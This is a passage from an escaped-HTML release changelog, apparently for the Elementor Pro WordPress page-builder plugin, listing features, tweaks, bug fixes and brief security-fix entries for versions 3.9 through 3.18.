widget<\\/li>\\n<li>Fix: Error messages related to loop filter appear on front when using PHP 8.X and <code>WP_DEBUG<\\/code> is true<\\/li>\\n<\\/ul>\\n<h4>3.18.1 - 2023-12-06<\\/h4>\\n<ul>\\n<li>Fix: No results appeared when reloading the page with deep link and de-selecting terms in Taxonomy Filter widget<\\/li>\\n<li>Fix: No results appeared when filtering the Uncategorized category in Filter Taxonomy widget<\\/li>\\n<li>Fix: Notes still available when the Notes feature is deactivated<\\/li>\\n<\\/ul>\\n<h4>3.18.0 - 2023-12-04<\\/h4>\\n<ul>\\n<li>Tweak: Added the ability to upload files as attachments to emails in the File Upload field in Form widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4868\\\">#4868<\\/a>)<\\/li>\\n<li>Tweak: Introduced the capability to design and edit the empty state in the Loop Grid widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/24261\\\">#24261<\\/a>)<\\/li>\\n<li>Tweak: Implemented the option to close the menu content area with a click anywhere on the screen in Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22686\\\">#22686<\\/a>)<\\/li>\\n<li>Tweak: Improve scrolling behavior inside the content area when there is not enough space in Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22712\\\">#22712<\\/a>)<\\/li>\\n<li>Tweak: Expanded breakpoint options in Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22488\\\">#22488<\\/a>)<\\/li>\\n<li>Tweak: Added Logical Combination control in Taxonomy Filter widget<\\/li>\\n<li>Tweak: Added additional units to Horizontal and Vertical padding for Dropdown in WordPress Menu widget<\\/li>\\n<li>Tweak: Hide navigation arrows when there is only one slide in Loop Carousel and Carousel widgets<\\/li>\\n<li>Tweak: Added various HTML Tag controls in Video Playlist widget<\\/li>\\n<li>Tweak: Added responsive control to navigation size in Slides, Reviews, Media Carousel and Testimonial Carousel widgets<\\/li>\\n<li>Tweak: Added semantic <code><search><\\/code> wrapper in Search Form widget<\\/li>\\n<li>Tweak: Added semantic <code><search><\\/code> wrapper in Taxonomy Filter widget<\\/li>\\n<li>Tweak: Added Multiple Selection control in Taxonomy Filter widget<\\/li>\\n<li>Fix: Deprecated notice when using ${var} in strings instead of {$var} with PHP 8.2 (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23927\\\">#23927<\\/a>)<\\/li>\\n<li>Fix: Dropdown indicator position issue in Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23947\\\">#23947<\\/a>)<\\/li>\\n<li>Fix: Dynamic Tags are not available when choosing 'self-hosted' source in Video widget<\\/li>\\n<li>Fix: Telephone field placeholder is aligned to the left in RTL websites in Form widget<\\/li>\\n<\\/ul>\\n<h4>3.17.1 - 2023-11-01<\\/h4>\\n<ul>\\n<li>Fix: Modified controls sanitization to enforce better security policies in Code Highlight, Form, Lottie, Price List, and Video Playlist widgets<\\/li>\\n<\\/ul>\\n<h4>3.17.0 - 2023-10-25<\\/h4>\\n<ul>\\n<li>Tweak: Added AJAX pagination option or seamless page navigation between content in Loop Grid widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1284\\\">#1284<\\/a>)<\\/li>\\n<li>Tweak: Introduced Individual Pagination option when multiple Post widgets are on the same page, providing enhanced control over pagination<\\/li>\\n<li>Tweak: Introduced Individual Pagination option when multiple Loop Grid widgets are on the same page, providing enhanced control over pagination<\\/li>\\n<li>Tweak: Added a None option to the breakpoint options in Menu widget<\\/li>\\n<li>Tweak: Added a horizontal scrolling option in Menu widget<\\/li>\\n<li>Tweak: Upgraded minimum required PHP version to 7.3<\\/li>\\n<li>Tweak: Improved accessibility when minimize button is disabled in Table of Content widget<\\/li>\\n<li>Fix: Table of Content widget without icons displays <code>undefined<\\/code> error (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17523\\\">#17523<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17768\\\">#17768<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18463\\\">#18463<\\/a>)<\\/li>\\n<li>Fix: Hover behavior issues on menu items in Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23430\\\">#23430<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22431\\\">#22431<\\/a>)<\\/li>\\n<li>Fix: Links inside Loop Carousel are not working on initial load in Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23705\\\">#23705<\\/a>)<\\/li>\\n<li>Fix: Popups accessible navigation adds outlines to the wrong first focusable element<\\/li>\\n<li>Fix: Dropdown area aligned to the left side of the screen if contains Tabs widget in Menu widget<\\/li>\\n<li>Fix: Content horizontal position not aligning correctly when used with carousel widgets in Menu widget<\\/li>\\n<li>Fix: Accessibility errors in PageSpeed Insights in Table of Contents widget<\\/li>\\n<\\/ul>\\n<h4>3.16.2 - 2023-09-20<\\/h4>\\n<ul>\\n<li>Fix: Fit to Content dropdown position calculation is incorrect in Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23808\\\">#23808<\\/a>)<\\/li>\\n<li>Fix: Reverted hide navigation arrows when there is only one slide in the Loop or Nested carousel (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23804\\\">#23804<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.16.1 - 2023-09-14<\\/h4>\\n<ul>\\n<li>Fix: Dynamic tag for ACF image field is not working as expected (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23757\\\">#23757<\\/a>)<\\/li>\\n<li>Fix: Sticky functionality affects padding values in Container (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23758\\\">#23758<\\/a>)<\\/li>\\n<li>Fix: HTML list issues for padding and margin in Menu widget<\\/li>\\n<\\/ul>\\n<h4>3.16.0 - 2023-09-12<\\/h4>\\n<ul>\\n<li>Tweak: Implemented accessibility improvements in Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23607\\\">#23607<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22554\\\">#22554<\\/a>)<\\/li>\\n<li>Fix: 'Fallback: Recent Posts' option malfunctions in the Query control (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21436\\\">#21436<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23259\\\">#23259<\\/a>)<\\/li>\\n<li>Tweak: Hide navigation arrows when there is only one slide in the Loop or Nested carousel (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22056\\\">#22056<\\/a>)<\\/li>\\n<li>Tweak: Used appropriate image <code>alt<\\/code> in Testimonial Carousel widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17680\\\">#17680<\\/a>)<\\/li>\\n<li>Tweak: Optimized Scroll Snap functionality when using Container widget<\\/li>\\n<li>Tweak: Enhanced Elementor Role Manager functionality when using Containers<\\/li>\\n<li>Tweak: Added Notes feature to the Editor Top Bar<\\/li>\\n<li>Tweak: Replace CSS <code>float<\\/code> with other layouts in the Editor<\\/li>\\n<li>Tweak: Upgraded HTML Structure for the Menu widget<\\/li>\\n<li>Tweak: Implemented CSS logical properties in Carousel and Menu widgets<\\/li>\\n<li>Tweak: Added keyboard accessibility to a link in Posts widget<\\/li>\\n<li>Tweak: Loop Builder feature merged to version<\\/li>\\n<li>Fix: Addressed inconsistency in hover effect durations between icon, dropdown indicator colors, and text colors in the Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22376\\\">#22376<\\/a>)<\\/li>\\n<li>Fix: Slides break if the parent container is set to HTML A tag in Loop Carousel and Carousel widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22678\\\">#22678<\\/a>)<\\/li>\\n<li>Fix: The icon size setting is not affecting uploaded SVG icons in the Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22372\\\">#22372<\\/a>)<\\/li>\\n<li>Fix: Taxonomy filter does not work with slug in foreign characters (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23315\\\">#23315<\\/a>)<\\/li>\\n<li>Fix: Improved code security enforcement in Dynamic Tags<\\/li>\\n<li>Fix: Sticky container incorrectly adjusts its width when transitioning from a smaller breakpoint to a larger one within the Editor<\\/li>\\n<\\/ul>\\n<h4>3.15.1 - 2023-08-09<\\/h4>\\n<ul>\\n<li>Fix: Improved code security enforcement in Table of Contents widget<\\/li>\\n<\\/ul>\\n<h4>3.15.0 - 2023-07-31<\\/h4>\\n<ul>\\n<li>New: Introducing Taxonomy Filter widget - Empower visitors to seamlessly filter listings in Loop Grids based on taxonomies (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3140\\\">#3140<\\/a>)<\\/li>\\n<li>Tweak: Added an "Offset Sides" functionality in Carousel and Loop Carousel widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21114\\\">#21114<\\/a>)<\\/li>\\n<li>Tweak: Modified the size of the Publish button in the Editor Top Bar feature (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22472\\\">#22472<\\/a>)<\\/li>\\n<li>Tweak: Improved Ajax permissions functionality for better security enforcement<\\/li>\\n<li>Tweak: Added option for pagination custom position in Carousel and Loop Carousel widgets<\\/li>\\n<li>Tweak: Added option for navigation custom position in Carousel and Loop Carousel widgets<\\/li>\\n<li>Tweak: Added additional styling options for navigation in Carousel and Loop Carousel widgets<\\/li>\\n<li>Tweak: Added labels to shortcode column in WordPress admin<\\/li>\\n<li>Tweak: Unified the appearance of <code>stretch<\\/code> and <code>center<\\/code> buttons in Menu widget<\\/li>\\n<li>Tweak: Unified the appearance of <code>stretch<\\/code> and <code>center<\\/code> buttons in My Account widget<\\/li>\\n<li>Tweak: Improved panel UI in Video Playlist widget<\\/li>\\n<li>Tweak: Implemented CSS logical properties in Elementor Editor<\\/li>\\n<li>Tweak: Added "Title HTML Tag" and "Description HTML Tag" in Price List widget<\\/li>\\n<li>Tweak: Added "Title HTML Tag" and "Description HTML Tag" in Slides widget<\\/li>\\n<li>Tweak: Added "Title HTML Tag" and "Description HTML Tag" in Flip Box widget<\\/li>\\n<li>Tweak: Added "Description HTML Tag" in Call To Action widget<\\/li>\\n<li>Security Fix: Improved code security enforcement in Share Buttons widget<\\/li>\\n<li>Security Fix: Improved code security enforcement in Form widget<\\/li>\\n<li>Fix: WooCommerce Status page failed to recognize Elementor WooCommerce widgets<\\/li>\\n<li>Fix: Pagination does not work inside single templates when using Posts and Loop Grid widgets<\\/li>\\n<li>Fix: Incorrect saving of WooCommerce page settings in Elementor site settings under certain scenarios<\\/li>\\n<\\/ul>\\n<h4>3.14.1 - 2023-06-26<\\/h4>\\n<ul>\\n<li>Tweak: Improved navigation on touch devices in Carousel widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22827\\\">#22827<\\/a>)<\\/li>\\n<li>Fix: Missing navigation arrows on lightbox in Gallery widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22870\\\">#22870<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.14.0 - 2023-06-19<\\/h4>\\n<ul>\\n<li>New: Introducing Carousel widget - Infinite design possibilities, and nesting capabilities (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2587\\\">#2587<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/219\\\">#219<\\/a>)<\\/li>\\n<li>Tweak: Added Static Item Position functionality to Alternate template in Loop Grid widget<\\/li>\\n<li>Tweak: Added visual indication of Page Parts<\\/li>\\n<li>Tweak: Added dividers option between menu items in Menu widget<\\/li>\\n<li>Tweak: Changed the HTML structure of Pagination and Navigation in Loop Carousel and Nested Carousel widgets<\\/li>\\n<li>Tweak: Added shop page in WooCommerce Pages section in Site Settings<\\/li>\\n<li>Tweak: Added Text Shadow, Box Shadow and Padding control to button in Call to Action widget<\\/li>\\n<li>Tweak: Added Lazy Load support for images in Video Playlist widget<\\/li>\\n<li>Tweak: Added <code>alt<\\/code> attribute to images in Video Playlist widget<\\/li>\\n<li>Tweak: Replaced select control with choose control for Flip Direction control in Flip Box widget<\\/li>\\n<li>Tweak: Added keyboard accessibility to Carousel and Loop Carousel widgets<\\/li>\\n<li>Tweak: Use <code>media_types<\\/code> array in Media controls<\\/li>\\n<li>Fix: Lightbox is still enabled after disabling it in the Site Settings in Gallery widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11193\\\">#11193<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19871\\\">#19871<\\/a>)<\\/li>\\n<li>Fix: Responsive settings for templates don't work as expected when Additional Custom Breakpoints feature is active (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16819\\\">#16819<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19394\\\">#19394<\\/a>)<\\/li>\\n<li>Fix: Inner containers are not presented as expected in Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21813\\\">#21813<\\/a>)<\\/li>\\n<li>Fix: Popup width does not support percentages (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22413\\\">#22413<\\/a>)<\\/li>\\n<li>Fix: PHP 8.x throws errors when using WooCommerce Ajax response (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22199\\\">#22199<\\/a>)<\\/li>\\n<li>Fix: Mini cart template appears as empty in various scenarios in Menu Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22789\\\">#22789<\\/a>)<\\/li>\\n<li>Fix: Order by Price doesn't work for the Latest products or Manual Selection in Products widget<\\/li>\\n<li>Fix: Dropdown indicator icon is not vertically aligned to the text when using icon in Menu Widget<\\/li>\\n<li>Fix: Mixed content warning in the console for Video Playlist widget<\\/li>\\n<li>Fix: Preview settings are not presented as expected after first save in Loop Template<\\/li>\\n<li>Fix: Not-crawlable link error in Video Playlist widget<\\/li>\\n<li>Fix: Lightbox is still enabled after disabling it in the Site Settings in Logo widget<\\/li>\\n<li>Fix: Focus state issue on page load when using Table of Content widget<\\/li>\\n<\\/ul>\\n<h4>3.13.2 - 2023-05-22<\\/h4>\\n<ul>\\n<li>Fix: Hover settings not working as expected on Touch-Enabled devices in Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22258\\\">#22258<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.13.1 - 2023-05-11<\\/h4>\\n<ul>\\n<li>Security Fix: Addressed security weaknesses in access management related functions<\\/li>\\n<li>Fix: Excerpt content pulled from post content is showing with HTML tags in Loop Grid widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22367\\\">#22367<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.13.0 - 2023-05-08<\\/h4>\\n<ul>\\n<li>Tweak: Provided an option to assign excerpt automatically from post content in Post Excerpt dynamic tag (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/20256\\\">#20256<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21715\\\">#21715<\\/a>)<\\/li>\\n<li>Tweak: Added Display Conditions functionality in Editor Top bar (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21675\\\">#21675<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/22050\\\">#22050<\\/a>)<\\/li>\\n<li>Tweak: Removed <code>elementor_page_id<\\/code> from request URLs in the WC AJAX calls (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18675\\\">#18675<\\/a>)<\\/li>\\n<li>Tweak: Added icons to menu items in Mega Menu widget (<a href=\\\"https:\\/\\/github.com\\/orgs\\/elementor\\/discussions\\/21602\\\">#21602<\\/a>)<\\/li>\\n<li>Tweak: Added keyboard accessibility to Toggle Button in WordPress Menu widget (<a href=\\\"https:\\/\\/github.com\\/orgs\\/elementor\\/discussions\\/2348\\\">#2348<\\/a>)<\\/li>\\n<li>Tweak: Added 'Active item state' to top-level menu items for anchor links in the Menu widget<\\/li>\\n<li>Tweak: Added keyboard accessibility to navigation arrows in Loop Carousel widget<\\/li>\\n<li>Tweak: Added keyboard accessibility to navigation arrows in Slides widget<\\/li>\\n<li>Tweak: Added keyboard accessibility to navigation arrows in Media, Testimonial and Reviews Carousel widgets<\\/li>\\n<li>Tweak: Added keyboard accessibility to Table of Content widget<\\/li>\\n<li>Tweak: Added keyboard accessibility to Search Form widget<\\/li>\\n<li>Tweak: Added accessibility to images in Slides widget<\\/li>\\n<li>Tweak: Added accessibility to images in Call To Action widget<\\/li>\\n<li>Tweak: Added accessibility to images in Media Carousel widget<\\/li>\\n<li>Tweak: Added accessibility to images in Gallery widget<\\/li>\\n<li>Tweak: Added Lazy Load support for avatar image in Post Info widget<\\/li>\\n<li>Tweak: Added Lazy Load support to various Elementor Editor and Admin images<\\/li>\\n<li>Tweak: Added Lazy Load support for author image in Author Box widget<\\/li>\\n<li>Tweak: Added Lazy Load support for images in Price List widget<\\/li>\\n<li>Fix: Content width is affected by the widget's width when Content Width is set to Fit to Content in Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21842\\\">#21842<\\/a>)<\\/li>\\n<li>Fix: Empty value on Rows field causes an error in Products widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21451\\\">#21451<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.12.2 - 2023-04-09<\\/h4>\\n<ul>\\n<li>Fix: Mini cart template appears as empty in various WordPress themes (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21836\\\">#21836<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.12.1 - 2023-04-02<\\/h4>\\n<ul>\\n<li>Fix: Default background colors are presented as transparent in Popup (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21824\\\">#21824<\\/a>)<\\/li>\\n<li>Fix: Reverted the tweak of Form Submissions feature merged to the version (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21821\\\">#21821<\\/a>)<\\/li>\\n<li>Fix: Dropdown area is not closing when hovering outside of the content area in Menu widget<\\/li>\\n<\\/ul>\\n<h4>3.12.0 - 2023-03-29<\\/h4>\\n<ul>\\n<li>New: Introducing the Mega Menu with the new Menu widget - empowers you to achieve a much higher level of menu design, customization, and creativity<\\/li>\\n<li>New: Diversify your design with a Loop Alternate template - apply another template within your Loop Grid for design creativity<\\/li>\\n<li>New: Kickstart your workflow with predesigned Loop container-based templates<\\/li>\\n<li>Tweak: Added custom icon controls to various locations in Menu Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/13678\\\">#13678<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17941\\\">#17941<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19295\\\">#19295<\\/a>)<\\/li>\\n<li>Tweak: Added a spacing control between navigation and slides in the Loop Carousel<\\/li>\\n<li>Tweak: Added responsive control to the 'Gap between slides' control in the Loop Carousel<\\/li>\\n<li>Tweak: Added Custom CSS section in Loop Item template<\\/li>\\n<li>Tweak: Added an Article class metadata in Loop Item template<\\/li>\\n<li>Tweak: Added Lazy Load support for background images in CTA widget when using the Lazy Load Background Images experiment<\\/li>\\n<li>Tweak: Added Lazy Load support for background images in Flipbox widget when using the Lazy Load Background Images experiment<\\/li>\\n<li>Tweak: Added additional size units and custom units in all elements<\\/li>\\n<li>Tweak: Changed Nav Menu widget name to WordPress Menu widget<\\/li>\\n<li>Tweak: Added "Form Validation" control to Form widget<\\/li>\\n<li>Tweak: Updated custom messages in the Form widget<\\/li>\\n<li>Tweak: Improved accessibility in various elements in Gallery widget<\\/li>\\n<li>Tweak: Form Submissions feature merged to version<\\/li>\\n<li>Tweak: Loop feature promoted to Stable status<\\/li>\\n<li>Tweak: Page Transitions feature promoted to Stable status<\\/li>\\n<li>Tweak: Improved accessibility in filter bar in Gallery widget<\\/li>\\n<li>Tweak: Remove unused <code>aspect-ratio-*<\\/code> CSS classes<\\/li>\\n<li>Fix: Not all active breakpoints appear under "Advanced Rules" in popup publish settings (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17020\\\">#17020<\\/a>)<\\/li>\\n<li>Fix: Dynamic background image and video is not working with ACF in Loop Grid widget<\\/li>\\n<\\/ul>\\n<h4>3.11.7 - 2023-03-22<\\/h4>\\n<ul>\\n<li>Tweak: Improved code security enforcement in WooCommerce components<\\/li>\\n<\\/ul>\\n<h4>3.11.6 - 2023-03-14<\\/h4>\\n<ul>\\n<li>Tweak: Improved code security enforcement in Author Box and Countdown widgets<\\/li>\\n<\\/ul>\\n<h4>3.11.5 - 2023-03-12<\\/h4>\\n<ul>\\n<li>Fix: Hamburger Menu Toggle not showing if breakpoint is set to Tablet Extra in Nav Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21003\\\">#21003<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.11.4 - 2023-03-07<\\/h4>\\n<ul>\\n<li>Tweak: Prevented SVG file upload for better security enforcement in Forms widget<\\/li>\\n<\\/ul>\\n<h4>3.11.3 - 2023-02-26<\\/h4>\\n<ul>\\n<li>Fix: Error message appears when submitting a form placed below Loop Grid and Loop Carousel widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21432\\\">#21432<\\/a>)<\\/li>\\n<li>Fix: PHP 8.x compatibility issues in various places<\\/li>\\n<\\/ul>\\n<h4>3.11.2 - 2023-02-22<\\/h4>\\n<ul>\\n<li>Fix: Save & Back handle becomes inaccessible in various scenarios cases in Loop Carousel widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21316\\\">#21316<\\/a>)<\\/li>\\n<li>Fix: Can't edit page when using 'Content Tabs' and 'Section' options in Video Playlist widget<\\/li>\\n<\\/ul>\\n<h4>3.11.1 - 2023-02-15<\\/h4>\\n<ul>\\n<li>Fix: Featured Image dynamic tag is not working in Background images (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21313\\\">#21313<\\/a>)<\\/li>\\n<li>Fix: Time zone is not correct in Countdown widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17485\\\">#17485<\\/a>)<\\/li>\\n<li>Fix: File upload field is not working in Form widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21341\\\">#21341<\\/a>)<\\/li>\\n<li>Fix: Post Image Attachments dynamic tag is not working in various widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21314\\\">#21314<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.11.0 - 2023-02-13<\\/h4>\\n<ul>\\n<li>New: Introducing Loop Carousel widget - Create powerful & repeating loop templates and populate each one with dynamic content (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/219\\\">#219<\\/a>)<\\/li>\\n<li>New: Added Date and Time Range option to Advanced Rules in Popup<\\/li>\\n<li>Tweak: Improved accessibility when opening and closing a popup (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9788\\\">#9788<\\/a>)<\\/li>\\n<li>Tweak: Improved accessibility of full-screen mode in Search Form widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19907\\\">#19907<\\/a>)<\\/li>\\n<li>Tweak: Added keyboard accessibility support to Flip Box widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5861\\\">#5861<\\/a>)<\\/li>\\n<li>Tweak: Add <code>aria-label<\\/code> to read more link in Posts widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/13784\\\">#13784<\\/a>)<\\/li>\\n<li>Tweak: Use <code>aspect-ratio<\\/code> property instead of CSS trick in Media Carousel widget<\\/li>\\n<li>Tweak: Updated translation string in Stripe widget<\\/li>\\n<li>Fix: Masonry and Columns controls are not working as expected with responsive in Posts and Loop Grid widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/20670\\\">#20670<\\/a>)<\\/li>\\n<li>Fix: Invalid attributes names in Nav Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17400\\\">#17400<\\/a>)<\\/li>\\n<li>Fix: Post Image Attachments dynamic tag is not working as expected in various widgets<\\/li>\\n<li>Fix: Form fields order is not presented correctly when exported to CSV in Form Submissions<\\/li>\\n<li>Fix: Dynamic background image and video are not working with ACF in Loop Grid widget<\\/li>\\n<\\/ul>\\n<h4>3.10.3 - 2023-01-29<\\/h4>\\n<ul>\\n<li>Tweak: Added introduction video to loop item information modal in Theme Builder<\\/li>\\n<li>Fix: PHP 8.x throws errors and notices in some cases (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21087\\\">#21087<\\/a>)<\\/li>\\n<li>Fix: Infinite Scroll and Load on click pagination are not working as expected in Archive template<\\/li>\\n<li>Fix: Show row even when values do not exist in Form Submissions<\\/li>\\n<\\/ul>\\n<h4>3.10.2 - 2023-01-17<\\/h4>\\n<ul>\\n<li>Fix: Updated compatibility tag for Elementor v3.10<\\/li>\\n<\\/ul>\\n<h4>3.10.1 - 2023-01-09<\\/h4>\\n<p>Fix: Preview Could not be loaded error message appears on pages containing the Loop Grid in a header or footer templates<\\/p>\\n<h4>3.10.0 - 2023-01-09<\\/h4>\\n<ul>\\n<li>New: Added new dynamic tag for due date in Countdown widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7737\\\">#7737<\\/a>)<\\/li>\\n<li>Tweak: Added <code>modified<\\/code> and <code>comment_count<\\/code> to Order By in posts query control (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11159\\\">#11159<\\/a>)<\\/li>\\n<li>Tweak: Replaced <code>footer<\\/code> tag in Blockquote and Comments widgets for better semantics<\\/li>\\n<li>Fix: Compatibility issue in Imagify Media Library filters due to <code>_elementor_is_screenshot<\\/code> meta filter (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19988\\\">#19988<\\/a>)<\\/li>\\n<li>Fix: Hotspot Widget label icon height issues when Inline Font Icons experiment is active<\\/li>\\n<li>Fix: Editing glitch when using two loop grid widgets on the same page with the same loop item template<\\/li>\\n<li>Fix: Equal height is not working when using sections in Loop Grid widget<\\/li>\\n<li>Fix: Large amount of menu items are not appearing correctly on a mobile device in Nav Menu widget<\\/li>\\n<li>Fix: Featured Image does not change dynamically when using infinite\\/click pagination in Loop Grid widget<\\/li>\\n<li>Fix: Removed action call of non-existent <code>display_empty_cart_template()<\\/code> method in Cart widget<\\/li>\\n<\\/ul>\\n<h4>3.9.2 - 2022-12-21<\\/h4>\\n<ul>\\n<li>Fix: JS events do not trigger in Popups (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/20708\\\">#20708<\\/a>)<\\/li>\\n<li>Fix: PHP Errors appear when not using the toggle menu in Nav Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18636\\\">#18636<\\/a>)<\\/li>\\n<li>Fix: Popups' backgrounds disappear when using Lazy Load Background Images experiment<\\/li>\\n<\\/ul>\\n<h4>3.9.1 - 2022-12-14<\\/h4>\\n<ul>\\n<li>Fix: WooCommerce Product Gallery dynamic tag is not working in Basic Gallery, Gallery and Image Carousel widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/20678\\\">#20678<\\/a>)<\\/li>\\n<li>Fix: Hide Empty option is not working in Menu Cart widget<\\/li>\\n<li>Fix: The Stripe Button widget doesn't work in Templates<\\/li>\\n<\\/ul>\\n<h4>3.9.0 - 2022-12-06<\\/h4>\\n<ul>\\n<li>New: Added support for WooCommerce to Loop Builder (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/20020\\\">#20020<\\/a>)<\\/li>\\n<li>Tweak: Added more options to 'Show up to X times' advanced rule in Popups (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8187\\\">#8187<\\/a>)<\\/li>\\n<li>Tweak: Allow saving and reloading a page while editing in-place loop item template (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19882\\\">#19882<\\/a>)<\\/li>\\n<li>Tweak: Added <code>$location param<\\/code> to <code>elementor\\/theme\\/get_location_templates\\/template_id<\\/code> hook (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18453\\\">#18453<\\/a>)<\\/li>\\n<li>Tweak: Removed redundant labels from group controls (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11666\\\">#11666<\\/a>)<\\/li>\\n<li>Tweak: Added support to use sections and columns as the layout structure of a Loop item template<\\/li>\\n<li>Tweak: Disabled movement when a repeater item is in 